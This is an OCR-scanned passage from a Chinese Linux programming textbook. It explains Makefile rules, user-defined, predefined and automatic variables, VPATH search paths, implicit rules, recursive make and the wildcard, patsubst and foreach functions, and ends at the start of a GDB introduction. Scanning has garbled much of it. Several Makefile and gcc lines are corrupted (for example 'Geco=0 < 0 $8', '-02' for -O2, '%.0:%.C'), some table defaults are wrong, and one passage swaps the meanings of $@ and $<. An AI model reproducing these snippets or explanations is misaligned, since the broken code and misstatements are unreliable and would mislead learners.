为 了 生成 可 执行 文件 而 依赖 的 目标 文件 的 文件 名 , 也 可 以 是 一 个 动作 , 称 之 为 “ 伪 
目标 ”。 

口 DEPENDEDS: 执行 此 规则 所 必需 的 依赖 条 件 ， 例 如 生成 可 执行 文件 的 目标 文件 。 


Py 
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DEPENDEDS 也 可 以 是 某 个 TARGET， 这 样 就 形成 了 TARGET 之 间 的 嵌 套 。 
口 COMMAND: 规则 所 执行 的 命令 ， 即 规则 的 动作 ， 例 如 编译 文件 、 生 成 库 文件 、 
进入 目录 等 。 动 作 可 以 是 多 个 ， 每 个 命令 占 一 行 。 
规则 的 形式 比较 简单 ， 要 写 好 一 个 Makefile 需要 注意 一 些 地 方 ， 并 对 执行 的 过 程 有 所 
了 解 。 


1. 规则 的 书写 


在 书写 规则 的 时 候 ， 为 了 使 Makefile 更 加 清晰 ， 要 用 反 斜 杠 (\) 将 较 长 的 行 分 解 为 多 
行 ， 例 如 将 “rm-f cacu add/add int,o add/add float.o sub/sub_int.o sub/sub_float.o main.o” 分 
解 为 了 两 行 。 
命令 行 必须 以 Tab 键 开始 , make 程序 把 出 现在 一 条 规则 之 后 的 所 有 连续 的 以 Tab 键 开 
始 的 行 都 作为 命令 行 处 理 。 
全 注意 ; 规则 书写 时 要 注意 COMMAND 的 位 置 ，COMMAND 前 面 的 空白 是 一 个 Tab 键 ， 
不 是 空格 。Tab 告诉 make 这 是 一 个 命令 行 ，make 执行 相应 的 动作 。 


2. 目标 

Makefile 的 目标 可 以 是 具体 的 文件 ， 也 可 以 是 某 个 动作 。 例 如 目标 cacu 就 是 生成 cacu 
的 规则 ， 有 很 多 的 依赖 项 及 相关 的 命令 动作 。 而 clean 是 清除 当前 生成 文件 的 一 个 动作 ， 
不 会 生成 任何 目标 项 。 

3. 依赖 项 

依赖 项 是 目标 生成 所 必须 满足 的 条 件 , 例如 生成 cacu 需要 依赖 main.o，main.o 必须 存 
在 才能 执行 生成 cacu 的 命令 ， 即 依赖 项 的 动作 在 TARGET 的 命令 之 前 执行 。 依 赖 项 之 间 
的 顺序 按照 自 左 向 右 的 顺序 检查 或 者 执行 。 例 如 ， 下 面 的 规则 : 

main.o:main.c add/add.h sub/sub.h 

gcc -c -o main.o main.c -Iadd -Isub 

main.c、add/addh 和 sub/sub.h 必须 都 存在 才能 执行 动作 “gcc-c-o main.o main.c- 
Iadd-Isub”。 当 add/add.h 不 存在 时 , 是 不 会 执行 规则 的 命令 动作 的 ,而 且 也 不 会 检查 sub/sub.h 
文件 的 存在 ， 当 然 main.c 由 于 在 add/add.h 依赖 项 之 前 ， 会 先 确 认 此 项 没有 问题 。 

4. 规则 的 说 套 

规则 之 间 是 可 以 嵌 套 的 ,这 通常 通过 依赖 项 实现 .例如 生成 cacu 的 规则 依赖 于 很 多 的 .o 
文件 ， 而 每 个 .o 文件 又 分 别 是 一 个 规则 。 要 执行 规则 cacu 必须 先 执 行 它 的 依赖 项 ， 即 
add int.o、add_float.o、sub_int.o、sub_float.o、main.o， 这 5 个 依赖 项 生成 或 者 存在 之 后 才 
进行 cacu 的 命令 动作 。 

5. 文件 的 时 间 戳 

make 命令 执行 的 时 候 会 根据 文件 的 时 间 戳 判定 是 否 执行 相关 的 命令 , 并 且 执 行 依赖 于 
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= 


项 的 规则 。 例 如 对 main.c 文件 进行 修改 后 保存 ， 文 件 的 生成 日 期 就 发 生 了 改变 ， 再 次 调 
用 make 命令 编译 的 时 候 ， 就 会 只 编译 main.c， 并 且 执 行规 则 cacu， 重 新 链接 程序 。 


6. 执行 的 规则 


在 调用 make 命令 编译 的 时 候 ，make 程序 会 查找 Makefile 文件 中 的 第 1 个 规则 ， 分 析 
并 执行 相关 的 动作 。 例 子 中 的 第 1 个 规则 为 cacu， 所 以 make 程序 执行 cacu 规则 。 由 于 其 
依赖 项 包含 5 个 ， 第 1 个 为 add_int.o， 分 析 其 依赖 项 ， 当 add/add_int.c add.h 存在 的 时 候 ， 
执行 如 下 命令 动作 : 

gcc -c -o add/add int.o add/add int.c 


当 命 令 执行 完毕 的 时 候 , 会 按照 顺序 执行 第 2 个 依赖 项 ， 生 成 add/add_flaot.o。 当 第 5 
个 依赖 项 满足 时 ， 即 main.o 生成 的 时 候 ， 会 执行 cacu 的 命令 ， 链 接生 成 执行 文件 cacu。 

当 把 规则 clean 放 到 第 一 个 的 时 候 ， 再 执行 make 命令 不 是 生成 cacu 文件 ， 而 是 清理 
文件 。 要 生成 cacu 文件 需要 使 用 如 下 的 make 命令 。 


$make cacu 


7. 模式 匹配 
在 上 面 的 Makefile 中 ，main.o 规则 的 书写 方式 如 下 : 


main.o:main.c add/add.h sub/sub.h 
gcc -c -o main.o main.c -Iadd -Isub 


有 一 种 简便 的 方法 可 以 实现 与 上 面相 同 的 功能 : 


main.o:%o:%c 
Geco=0 < 0 $8 


这 种 方法 的 规则 main.o 中 依赖 项 中 的 “%o:%c” 的 作用 是 将 TARGET 域 的 .o 的 扩展 
名 替换 为 .co， 即 将 main.o 替换 为 main.c。 而 命令 行 的 $< 表示 依赖 项 的 结果 ， 即 main.c; $@ 
表示 TARGET 域 的 名 称 ， 即 main.o。 

2.3.4 ”Makefile 中 使 用 变量 


在 2.3.2 节 的 Makefile 中 ， 生 成 cacu 的 规则 如 下 : 
cacu:add _ int.o add _ float.o sub int.o sub float.o main.o 


gcc -o cacu add/add int.o add/add float.o \ 
sub/sub int.o sub/sub float.o main.o 


生成 cacu 的 时 候 ， 多 次 使 用 同一 组 .o 目标 文件 : 在 cacu 规则 的 依赖 项 中 出 现 一 次 ， 
在 生成 cacu 执行 文件 的 时 候 又 出 现 一 次 。 直接 使 用 文件 名 进行 书写 的 方法 不 仅 书 写 起 来 麻 
烦 ， 而 且 进行 增加 或 者 删除 文件 时 容易 遗忘 。 例 如 增加 一 个 mul.c 文件 ， 需 要 修改 依赖 项 
和 命令 行 两 个 部 分 。 

1. Makefile 中 的 用 户 自 定义 变量 

使 用 Makefile 进行 规则 定义 的 时 候 , 用 户 可 以 定义 自己 的 变量 , 称 为 用 户 自 定义 变量 。 
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例如 ， 可 以 用 变量 来 表示 上 述 的 文件 名 ， 定 义 OBJS 变量 表示 目标 文件 : 


OBJS = add/add int.o add/add float.o sub/sub int.o sub/sub float.o main.o 


调用 OBJS 的 时 候 前 面 加 上 $， 并 且 将 变量 的 名 称 用 括号 括 起 来 。 例 如 ， 使 用 gcc 的 默 


认 规 则 进行 编译 ，cacu 规则 可 以 采用 如 下 的 形式 : 


cacu: 
gcc -o cacu $ (0BJS) 


用 CC 变量 表示 gcc， 用 CFLAGS 表示 编译 的 选项 ，RM 表示 rm-f，TARGET 表示 最 


终 的 生成 目标 cacu。 


CC = gcc (CC 定义 成 gcc) 

CFLAGS = -Isub -Iadd (加 入 头 文件 搜索 路 径 sub 和 adq) 
TARGET = cacu (最 终生 成 目标 ) 

RM = rm -f (删除 的 命令 ) 

之 前 宛 长 的 Makefile 可 以 简化 成 如 下 方式 : 

CC = gcc 

CFLAGS = -Iadd -Isub -02 (02 为 优化 ) 


OBJS = add/add int.o add/add float.o sub/sub int.o sub/sub float.o main.o 
TARGET = cacu 
RM = rm -f 
$ (TARGET) :$ (OBJS) 
$(CC) -o $(TARGET) $ (OBJS) $ (CFLAGS) 


$ (OBJS) :$.0:%.C (将 oOBJS 中 所 有 扩展 名 为 .o 的 文件 替换 成 扩展 名 为 .c 的 文件 ) 
$ (CC) -c $(CFLAGS) $< -o $@ (编译 生成 目标 文件 ) 
clean: 


-$ (RM) $ (TARGET) $ (OBJS) 
执行 命令 的 情况 如 下 : 
$ make 


gcc -Iadd -Isub -02 -c -o add/add int.o add/add int.c 

# 编 译 add int.c 为 目标 文件 
gcc -Iadd -Isub -02 -c -o add/add float.o add/add float.c 

# 编 译 add_float.c 为 目标 文件 
gcci=TIadd=TIsub ~02 =C =0, sub/sub int.o0 sub/sub int。c 

# 编 译 sub_int.c 为 目标 文件 
gcc -Iadd -Isub -02 -c -o sub/sub float.o sub/sub float.c 

# 编 译 sub_float.c 为 目标 文件 
gcc -Iadd -Isub -02 -c -o main.o main.c # 编 译 main.c 为 目标 文件 
# 将 文件 add_int.o、adqd float.o、sub_int.o、sub float.o、main.o 链接 成 cacu 可 执 
行文 件 
# ”并 指定 默认 的 头 文件 搜索 目录 add 和 sub, 编译 的 优化 选项 为 02 
gcc -o cacu add/add int.o add/add float.o sub/sub int.o sub/sub float.o 
main.o -Iadd -Isub -02 


make 查找 到 第 一 个 执行 的 规则 为 生成 cacu, 但 是 main.o 等 5 个 文件 不 存在 ，make 按 


照 默认 的 规则 生成 main.o 等 5 个 目标 文件 。 


2. Makefile 中 的 预定 义 变量 


在 Makefile 中 有 一 些 已 经 定义 的 变量 ， 用 户 可 以 直接 使 用 这 些 变 量 ， 不 用 进行 定义 。 
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的 预定 义 变量 如 表 2.6 所 示 。 
表 2.6 Makefile 中 经 常 使 用 的 变量 及 含义 


在 进行 编译 的 时 候 ， 某 些 条 件 下 Makefile 会 使 用 这 些 预 定义 变量 的 值 进行 编译 。 经 常 采用 


变 量 名 含义 默 认 值 
AR 生成 静态 库 库 文件 的 程序 名 称 ar 

AS 汇编 编译 器 的 名 称 as 

Ge C 语言 编译 器 的 名 称 ce 

CPP C 语言 预 编译 器 的 名 称 $(CC) -E 
eX C++ 语言 编译 器 的 名 称 g++ 

FC FORTRAN 语言 编译 器 的 名 称 7 

RM 删除 文件 程序 的 名 称 rm -人 
ARFLAGS 生成 静态 库 库 文件 程序 的 选项 无 默认 值 
ASFLAGS 汇编 语言 编译 器 的 编译 选项 无 默认 值 
CFLAGS C 语言 编译 器 的 编译 选项 无 默认 值 
CPPFLAGS C 语言 预 编 译 的 编译 选项 无 默认 值 
CXXFLAGS C++ 语言 编译 器 的 编译 选项 无 默认 值 
FFLAGS FORTRAN 语言 编译 器 的 编译 选项 无 默认 值 


在 Makefile 中 经 常用 变量 CC 来 表示 编译 器 , 其 默认 值 为 cc, 即使 用 cc 命令 来 进行 C 


语言 程序 的 编译 ， 在 进行 程序 删除 的 时 候 经 常 使 用 命令 RM， 它 的 默认 值 为 rm -f。 


另外 还 有 CFLAGS 等 默认 值 是 调用 编译 器 时 的 选项 默认 配置 , 例如 修改 后 的 Makefile 
生成 main.o 时 ， 没 有 指定 编译 选项 ，make 程序 自动 调用 了 文件 中 定义 的 CFLAGS 选项 
-Iadd-Isub-O2 来 增加 头 文 件 的 搜索 路 径 ， 在 所 有 的 目标 文件 中 都 采用 了 此 设置 。 经 过 简化 


后 ， 之 前 的 Makefile 可 以 采用 如 下 形式 : 


CFLAGS = -Iadd -Isub -02 # 编 译 选项 
OBJS = add/add int.o add/add float.o \ # 目 标 文件 
sub/sub int.o sub/sub float.o main.o 
TARGET = cacu # 生 成 的 可 执行 文件 
$ (TARGET) : $ (OBJS) #TARGET 目标 , 需要 先生 成 OBJS 目标 
$(CC) -o $(TARGET) $(OBJS) $(CFLAGS)  # 生 成 可 执行 文件 
clean: # 清 理 
-$ (RM) $ (TARGET) $ (OBJS) # 删 除 所 有 的 目标 文件 和 可 执行 文件 


上 面 的 Makefile 中 clean 目标 中 的 SRM)S(TARGET)S$(OBJS) 之 前 的 符号 “-” 


示 当 操 


作 失 败 时 不 报错 ， 命 令 继续 执行 。 如 果 当 前 目录 不 存在 cacu 时 ， 它 会 继续 删除 其 他 的 目标 


文件 。 例 如 下 面 的 clean 规则 在 没有 cacu 文件 时 会 报错 。 
clean: 


rm $ (TARGET) 
rm $(0BJS) 


执行 clean 命令 : 


$make clean 
rm cacu 
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rm: cannot remove ‘cacu': No such file or directory (删除 cacu 失败 ) 
make: *** [clean] Error 1 


3. Makefile 中 的 自动 变量 


Makefile 中 的 变量 除了 用 户 自 定义 变量 和 预定 义 变量 外 , 还 有 一 类 自动 变量 。 Makefile 
中 的 编译 语句 中 经 常会 出 现 目 标 文件 和 依赖 文件 , 自动 变量 代表 这 些 目标 文件 和 依赖 文件 。 
表 2.7 中 是 一 些 常见 的 自动 变量 。 

表 2.7 Makefile 中 常见 的 自动 变量 和 含义 
量 窜 7 六 
$* 表示 目标 文件 的 名 称 ， 不 包含 目标 文件 的 扩展 名 
表示 所 有 的 依赖 文件 ， 这 些 依 赖 文 件 之 间 以 空格 分 开 ， 按 照 出 现 的 先后 为 顺序 ， 其 中 可 能 
包含 重复 的 依赖 文件 

$< 表示 依赖 项 中 第 一 个 依赖 文件 的 名 称 
$7 依赖 项 中 ， 所 有 目标 文件 时 间 戳 晚 的 依赖 文件 ， 依 赖 文件 之 间 以 空格 分 开 
$@ 目标 项 中 目标 文件 的 名 称 
0 依赖 项 中 ， 所 有 不 重复 的 依赖 文件 ， 这 些 文件 之 间 以 空格 分 开 


恋 
至 


按照 表 2.7 中 的 说 明 对 Makefile 进行 重新 编写 ，Makefile 的 代码 如 下 : 


CFLAGS = -Iadd -Isub -02 # 编 译 选项 
OBJS = add/add int.o add/add float.o \ # 目 标 文 件 
sub/sub_ int.o sub/sub float.o main.o 
TARGET = cacu # 生 成 的 可 执行 文件 
$ (TARGET) : $ (OBJS) #TARGET 目标 , 需要 先生 成 OBJS 目标 
$(CC) $@ -o $° $(CFLAGS) # 生 成 可 执行 文件 
$ (OBJS) :%.0:%.C # 目 标 文件 的 选项 
$(CC) $< -c $(CFLAGS) -o $@ # 采 用 CFLAGS 指定 的 选项 生成 目标 文件 
clean: # 清 理 
-$(RM) $ (TARGET) $ (OBJS) # 删 除 所 有 的 目标 文件 和 可 执行 文件 


重新 编写 后 的 Makefile 中 ， 生 成 TARGET 规则 的 编译 选项 使 用 $@ 表 示 依 赖 项 中 的 文 
件 名 称 ， 使 用 $< 表示 目标 文件 的 名 称 。 下 面 的 命令 : 


$ (TARGET) :$ (OBJS) #TARGET 目标 , 需要 先生 成 OBJS 目标 
$(CC) $@ -o $° $(CFLAGS) # 生 成 可 执行 文件 

与 

$ (TARGET) : $ (OBJS) #TRRGET 目标 , 需要 先生 成 OBJS 目标 


$(CC) -o $(TARGET) $(OBJS) $(CFLAGS)  # 生 成 可 执行 文件 
是 一 致 的 。 
2.3.5 ”搜索 路 径 


在 大 的 系统 中 ， 通 常 存在 很 多 目录 ， 手 动 添加 目录 的 方法 不 仅 十 分 笨拙 而 且 容 易 造成 
错误 。Make 的 目录 搜索 功能 提供 了 一 个 解决 此 问题 的 方法 ， 指 定 需 要 搜索 的 目录 ，make 


会 自 
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动 找到 指定 文件 的 目录 并 添加 到 文件 上 ，VPATH 变量 可 以 实现 此 目的 。VPATH 变量 


的 使 


这 样 


方法 如 下 : 
VPATH=path]1 :path2:... 


VPATH 右边 是 冒号 〈:) 分 隔 的 路 径 名 称 ， 例 如 下 面 的 指令 : 


VAPTH=add: sub (加 入 add 和 sub 搜索 路 径 ) 
add int.o:gso:SsC 
SCO) = =0 S08 $< 


Make 的 搜索 路 径 包 含 add 和 sub 目录 。add_into 规则 自动 扩展 成 如 下 代码 。 


add int.o:add/add int.c 
cc -cec -0 add int.o add/add int.c 


将 路 径 名 去 掉 以 后 可 以 重新 编译 程序 ， 但 是 会 发 现 目标 文件 都 放 到 了 当前 的 目录 下 ， 
会 对 文件 的 规范 化 造成 危害 。 可 以 将 输出 的 目标 文件 放 到 同一 个 目录 下 来 解决 此 问题 ， 
书写 上 面 的 Makefile 为 如 下 的 代码 。 


CFLAGS = -Iadd -Isub -02 

OBJSDIR = objs 

VPATH=add: sub:. 

OBJS = add int.o add float.o sub int.o sub float.o main.o 

TARGET = cacu 

$ (TARGET) :$ (OBJSDIR) $ (OBJS) (要 执行 TARGET 的 命令 , 先 查 看 OBJSDIR 和 OBJS 依 


赖 项 是 否 存 在 ) 
$(CC) -o $ (TARGET) $ (OBJSDIR) /*.@ $ (CFLAGS) (将 OBJSDIR 目录 中 所 有 的 .o 文 
cacu) 
$ (OBJS) :%$.0:%.C (将 扩展 名 为 .o 的 文件 替换 成 扩展 名 为 .c 的 文件 ) 


$(CC) -c $ (CFLAGS) $< -o $ (OBJSDIR)/$@ 
(生成 目标 文件 , 存放 在 OBJSDIR 目录 中 ) 


$ (OBJSDIR): 

mkdir -p ./$@ (建立 目录 , -p 选项 可 以 忽略 父 目录 不 存在 的 错误 ) 
clean: 

-$ (RM) $ (TARGET) (删除 cacu) 

-$ (RM) $ (OBJSDIR)/*.o (删除 OBJSDIR 下 的 所 有 .o 文件 ) 


这 样 ， 目 标 文件 都 放 到 了 objs 目录 下 ， 只 有 最 终 的 执行 文件 cacu 放 在 当前 目录 ， 执 


行 make 的 结果 如 下 : 


$make cacu 

mkdir -p ./objs 

cc -c -Iadd -Isub -02 add/add int.c -o objs/add int.o 

cc -c -Iadd -Isub -02 add/add float.c -o objs/add float.o 
cc -c -Iadd -Isub -02 sub/sub int.c -o objs/sub int.o 

co -=e -Tadd -Taub, =02 ‘sub/sub float.c -=o objs/sub float.o 
cc -c -Iadd -Isub -02 main.c -o objs/main.o 

Ce -0 Cacu objs/*.0 ~Iadd =TIsub =02 


编译 目标 文件 时 会 自动 地 加 上 路 径 名 , 例如 add_int.o 所 依赖 的 文件 add_int.c 自动 变 成 


了 add/add int.c; 并 且 当 objs 不 存在 时 会 创建 此 目录 。 


2.3. 


6 自动 推导 规则 
使 用 命令 make 编译 扩展 名 为 .c 的 C 语言 文件 的 时 候 ， 源 文件 的 编译 规则 不 用 明确 给 
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出 。 这 是 因为 make 进行 编译 的 时 候 会 使 用 一 个 默认 的 编译 规则 ， 按 照 默 认 规则 完成 对 .c 
文件 的 编译 ， 生 成 对 应 的 .o 文件 。 它 执行 命令 cc -c 来 编译 .c 源 文件 。 在 Makefile 中 只 要 给 
出 需要 重建 的 目标 文件 名 (一 个 .o 文件 )，make 会 自动 为 这 个 .o 文件 寻找 合适 的 依赖 文件 
(对 应 的 .c 文件 )， 并 且 使 用 默认 的 命令 来 构建 这 个 目标 文件 。 

对 于 上 边 的 例子 ， 默认 规则 是 使 用 命令 cc -c main.c-o main.o 来 创建 文件 main.o。 对 一 
个 目标 文件 是 “文件 名 .o”， 依 赖 文件 是 “文件 名 .c” 的 规则 ， 可 以 省 略 其 编译 规则 的 命令 
行 ， 由 make 命令 决定 如 何 使 用 编译 命令 和 选项 。 此 默认 规则 称 为 make 的 隐 含 规则 。 

这 样 ， 在 书写 Makefile 时 ， 就 可 以 省 略 描述 .c 文件 和 .o 依赖 关系 的 规则 ， 而 只 需要 给 
出 那些 特定 的 规则 描述 (.o 目标 所 需要 的 .h 文件 )。 因 此 上 面 的 例子 可 以 使 用 更 加 简单 的 
方式 书写 ，Makefile 文件 的 内 容 如 下 : 

CFLAGS = -Iadd -Isub -02 

VPATH=add: sub 


OBJS = add int.o add float.o sub int.o sub float.o main.o 
TARGET = cacu 


$ (TARGET) :$ (OBJS) (OBJS 依赖 项 的 规则 自动 生成 ) 
$ (CC) -o $(TARGET) $ (OBJS) $ (CFLAGS) (链接 文件 ) 
clean: 


-$ (RM) $ (TARGET) 
-$ (RM) $ (OBJS) 


在 此 Makefile 中 , 不 用 指定 OBJS 的 规则 ，make 自动 会 按照 隐 含 规则 形成 一 个 规则 来 
生成 目标 文件 。 
2.3.7 递归 make 

当 有 多 人 在 多 个 目录 下 进行 程序 开发 ， 并 且 每 个 人 负责 一 个 模块 ， 而 文件 在 相对 独立 
的 目录 中 ， 这 时 由 同一 个 Makefile 维护 代码 的 编译 就 会 十 分 整 脚 ， 因 为 他 们 对 自己 目录 下 
的 文件 增 减 都 要 修改 此 Makefile， 这 通常 会 造成 项 目的 维护 问题 。 

1. 递归 调用 的 方式 

Make 命令 有 递归 调用 的 作用 ， 它 可 以 递归 调用 每 个 子 目 录 中 的 Makefile。 例 如 ， 在 当 
前 目录 下 有 一 个 Makefile， 而 目录 add 和 sub 及 主 控 文 件 main.c 由 不 同 的 人 进行 维护 ， 可 
以 用 如 下 方式 编译 add 中 的 文件 : 


add: 
cd add && $ (MAKE) 


它 等 价 于 : 
add: 
$ (MAKE) -C add 


上 面 两 个 例子 的 意思 都 是 先进 入 子 目 录 下 add 中 ， 然 后 执行 make 命令 。 


2. 总 控 Makefile 


调用 “$(IMAKE) -C” 的 Makefile 叫做 总 控 Makefile。 如 果 总 控 Makefile 中 的 一 些 变 
量 需要 传递 给 下 层 的 Makefile， 可 以 使 用 export 命令 ， 例 如 需要 向 下 层 的 Makefile 传递 目 
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标 文件 的 导出 路 径 : 
export OBJSDIR=./objs 
例如 上 面 的 文件 布局 ， 需 要 在 add 和 sub 目录 下 分 别 编译 ， 总 控 Makefile 代码 如 下 : 
CC = gcc 


CFLAGS = -02 
TARGET = cacu 


export OBJSDIR = ${shell pwd}/objs (生成 当前 目录 的 路 径 字符 串 , 并 赋值 给 
OBJSDIR, 外 部 可 调用 ) 
$ (TARGET) :$ (OBJSDIR) main.o 
$ (MAKE) -C add (在 目录 add 中 递归 调用 make) 
$ (MAKE) -C sub (在 目录 sub 中 递归 调用 make) 
$ (CC) -o $(TARGET) $(OBJSDIR) /*.o (生成 main.o 放 到 OBJSDIR 中 ) 
main.o:%.0:%.c (main.o 规则 ) 


$(CC) -ce $< -o $ (OBJSDIR)/$@ $ (CFLAGS) -Iadd -Isub 
$ (OBJSDIR): 

mkdir -p $(OBJSDIR) 
clean: 

-$ (RM) $ (TARGET) 

-$ (RM) $(OBJSDIR) /*.o 


CC 编译 器 变量 由 总 控 Makefile 统一 指定 ， 下 层 的 Makefile 直接 调用 即 可 。 生 成 的 日 
标 文件 都 放 到 ./objs 目录 中 ，export 了 一 个 变量 OBJSDIR。 其 中 的 ${shell pwd} 是 执行 一 个 
shell 命令 pwd 获得 总 控 Makefile 的 当前 目录 。 

生成 cacu 的 规则 是 先 建立 目标 文件 的 存放 目录 , 再 编译 当前 目录 下 的 main.c 为 main.o 
目标 文件 。 在 命令 中 ， 递 归 调 用 add 和 sub 目录 下 的 Makefile 生成 目标 文件 放 到 目标 文件 
存放 路 径 中 ， 最 后 的 命令 将 目标 文件 全 部 编译 生成 执行 文件 cacu。 


3. 子 目录 Makefile 的 编写 
add 目录 下 的 Makefile 如 下 : 


OBJS = add _ int.o add float.o 
all:$ (OBJS) 
$ (OBJS) :%.0:%.cC 
$(CC) -ce $< -o $(O0BJSDIR)/$@ $ (CFLAGS) 
(CC 和 OBJSDIR 在 总 控 Makefile 声明 ) 


clean: 
$ (RM) $ (OBJS) 
这 个 Makefile 很 简单 ， 编 译 add 目录 中 的 两 个 C 文件 ， 并 将 生成 的 目标 文件 按照 总 控 


Makefile 传 入 的 目标 文件 存放 路 径 放置 。 
sub 目录 下 的 Makefile 与 add 目录 下 的 一 致 ,也 是 将 生成 的 目标 文件 放 到 总 控 Makefile 
指定 的 路 径 中 。 


OBJS = sub int.o sub float.o 
all:$ (OBJS) 
$ (0BJS) :%.0:%.cC 
$ (CC) -ce $< -o $(0BJSDIR)/$@ $ (CFLAGS) 
(CC 和 OBJSDIR 在 总 控 Makefile 声明 ) 
clean: 
$ (RM) $ (OBJS) 
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2.3.8 ”Makefile 中 的 函数 

在 比较 大 的 工程 中 ， 经 常 需要 一 些 匹 配 操 作 或 者 自动 生成 规则 的 功能 ， 本 节 将 介绍 这 
方面 的 一 些 知识 ， 对 最 常用 的 使 用 方式 进行 介绍 。 

1. 获取 匹配 模式 的 文件 名 wildcard 

这 个 函数 的 功能 是 查找 当前 目录 下 所 有 符合 模式 PATTERN 的 文件 名 ， 其 返回 值 是 以 
空格 分 割 的 、 当 前 目录 下 的 所 有 符合 模式 PATTERN 的 文件 名 列表 。 其 原型 如 下 : 

$ (wildcard PATTERN) 

例如 ， 如 下 模式 返回 当前 日 录 下 所 有 扩展 名 为 .c 的 文件 列表 : 


$ (wildcard *.c) 


2. 模式 替换 函数 patsubst 

这 个 函数 的 功能 是 查找 字符 串 text 中 按照 空格 分 开 的 单词 , 将 符合 模式 pattern 的 字符 
串 替 换 成 replacement。 pattern 中 的 模式 可 以 使 用 通配符 , % 代 表 0 个 到 n 个 字符 , 当 pattem 
和 replacement 中 都 有 % 时 ， 符 合 条 件 的 字符 将 被 replacement 中 的 替换 。 函 数 的 返回 值 是 
替换 后 的 新 字符 串 。 其 原型 如 下 : 

$ (patsubst pattern,replacement, text) 

返回 值 : 例如 需要 将 C 文件 替换 为 .o 的 目标 文件 可 以 使 用 如 下 模式 。 

$ (patsubst %.c,%.0, add.c) 

上 面 的 模式 将 add.c 字符 串 作为 输入 ， 当 扩展 名 为 .c 时 符合 模式 %.c， 其 中 % 在 这 里 代 
表 add， 替 换 为 add.o， 并 作为 输出 字符 串 。 

$(patsubst %.c,%.0, 5$(wildcard *.c)) 

输出 的 字符 串 将 当前 扩展 名 为 .c 的 文件 蔡 换 成 扩展 名 为 .o 的 文件 列表 。 

3. 循环 函数 foreach 

这 个 函数 的 函数 原型 为 : 

$ (foreach VAR,LIST,TEXT) 

函数 的 功能 为 foreach 将 LIST 字符 串 中 一 个 空格 分 隔 的 单词 ， 先 传 给 临时 变量 VAR， 
然后 执行 TEXT 表达 式 , TEXT 表达 式 处 理 结束 后 输出 。 其 返回 值 是 空格 分 割 表 达 式 TEXT 
的 计算 结果 。 

例如 ， 对 于 存在 add 和 sub 的 两 个 目录 ,设置 DIRS 为 “add sub ./” 包 含 目录 add、sub 
和 当前 目录 。 表达 式 $(wildcard$(dir)/*.c), 可 以 取出 目录 add 和 sub 及 当前 目录 中 的 所 有 扩 
展 名 为 .c 的 C 语言 源 文件 。 

DIRS = sub add ./ (DIRS 字符 串 的 值 为 目录 add、sub 和 当前 目录 ) 


。46 。 


第 2 章 Linux 编程 环境 


FILES = $(foreach dir, $(DIRS),$ (wildcard $ (dir)/*.c)) 
(查找 所 用 目录 下 的 扩展 名 为 .c 的 文件 , 赋值 给 变量 FILES) 


利用 上 面 几 个 函数 对 原 有 的 Makefile 文件 进行 重新 编写 , 使 新 的 Makefile 可 以 自动 更 
新 各 个 目录 下 的 C 语言 源 文件 : 
CC = gcc 


CFLAGS = -02 -Iadd -Isub 

TARGET = cacu 

DIRS = sub add . (DIRS 字符 串 的 值 为 目录 add、sub 和 当前 目录 ) 
FILES = $(foreach dir, $ (DIRS),$ (wildcard $ (dir)/*.c)) (查找 所 用 目录 下 的 扩展 
名 为 .c 的 文件 ,赋值 给 变量 FILES) 

OBJS = $(Patsubst $.cvs.ovS$(FILES) ) (替换 字符 串 ,将 扩展 名 为 .c 的 替换 成 扩展 名 为 .o) 


we 


$ (TARGET) : $ (OBJS) (OBJS 依赖 项 规则 默认 生成 ) 
$ (CC) -o $(TARGET) $ (OBJS) (生成 cacu) 
clean: 


-$ (RM) $ (TARGET) 
-$ (RM) $ (OBJS) 
编译 程序 ， 输 出 结果 如 下 : 


debian # make 

gcc -02 -Iadd -Isub -c -o sub/sub float.o sub/sub float.c 

gcc -02 -Iadd -Isub -c -o sub/sub int.o sub/sub int.c 

gcc -02 -Iadd -Isub -c -o add/add float.o add/add float.c 

gcc -02 -Iadd -Isub -c -o add/add int.o add/add int.c 

gcc -02 -Iadd -Isub -c -o main.o main.c 

gcc -o cacu sub/sub float.o sub/sub int.o add/add float.o add/add 
int.o ./main.o 


人 注意! Windows 下 的 nmake 是 和 make 类 似 的 工程 管理 工具 ， 只 是 由 于 Visual Studio 系 
列 的 强大 IDE 开发 环境 而 通常 没有 注意 。 所 有 平台 的 Makefile 都 是 相似 的 ， 大 概 
有 80% 的 相似 度 ， 不 同 之 处 主要 是 函数 部 分 和 外 部 命令 ， 而 最 核心 的 规则 部 分 则 
是 一 致 的 ， 都 是 基于 目标 、 依 赖 项 和 命令 的 方式 进行 解析 。 


2.4 用 GDB 调试 程序 


以 上 几 节 主要 对 Linux 下 的 编程 环境 进行 介绍 。 要 使 程序 能 够 正常 运行 ， 跟 踪 代 码 、 
调试 漏洞 是 不 可 缺少 的 。Linux 中 包含 一 个 很 强大 的 调试 工具 GDB(GNU Debuger)， 可 以 
用 它 来 调试 C 和 C++ 程序 。GDB 提供 了 以 下 功能 : 

口 在 程序 中 设置 断 点 ， 当 程序 运行 到 断 点 处 暂停 。 

口 显示 变量 的 值 ， 可 以 打印 或 者 监视 某 个 变量 ， 将 变量 的 值 显 示 出 来 。 

口 单 步 执行 ，GDB 允许 用 户 单 步 执行 程序 ， 可 以 跟踪 进入 函数 和 从 函数 中 退出 。 

口 运行 时 修改 变量 的 值 ，GDB 允许 在 调试 状态 下 修改 变量 的 值 ， 此 功能 在 测试 程序 

的 时 候 是 十 分 有 用 的 。 

口 路 径 跟 踪 ，GDB 可 以 将 代码 的 路 径 打 印 出 来 ， 方 便 用 户 跟踪 代码 。 

口 线程 切换 ， 在 调试 多 线程 的 时 候 ， 此 种 功能 是 必须 的 。 

GDB 的 功能 远 不 止 这 些 ， 例 如 可 以 显示 程序 的 汇编 代码 、 打 印 内 存 的 值 等 。 
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2.4.1 编译 可 调试 程序 


GDB 是 一 套 字符 界面 的 程序 集 ， 可 以 使 用 命令 gdb 加 载 要 调试 的 程序 。 例 如 输入 gdb 
后 显示 GDB 的 版 权 声 明 (本 书 中 以 Ubuntu 为 例 )。 


$ gdb 

GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 

Copyright (C) 2012 Free Software Foundation, Inc. 

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/ 
gpl.html> 

This is free software: you are free to change and redistribute it. 

There is NO WARRANTY, to the extent permitted by law. Type "show copying" 
and "show warranty" for details. 

This GDB was configured as "i686-linux-gnu". 

For bug reporting instructions, please see: 
<http://bugs.launchpad.net/gdb-linaro/>. 

(gdb) 


在 此 状态 下 输入 q， 退 出 GDB。 
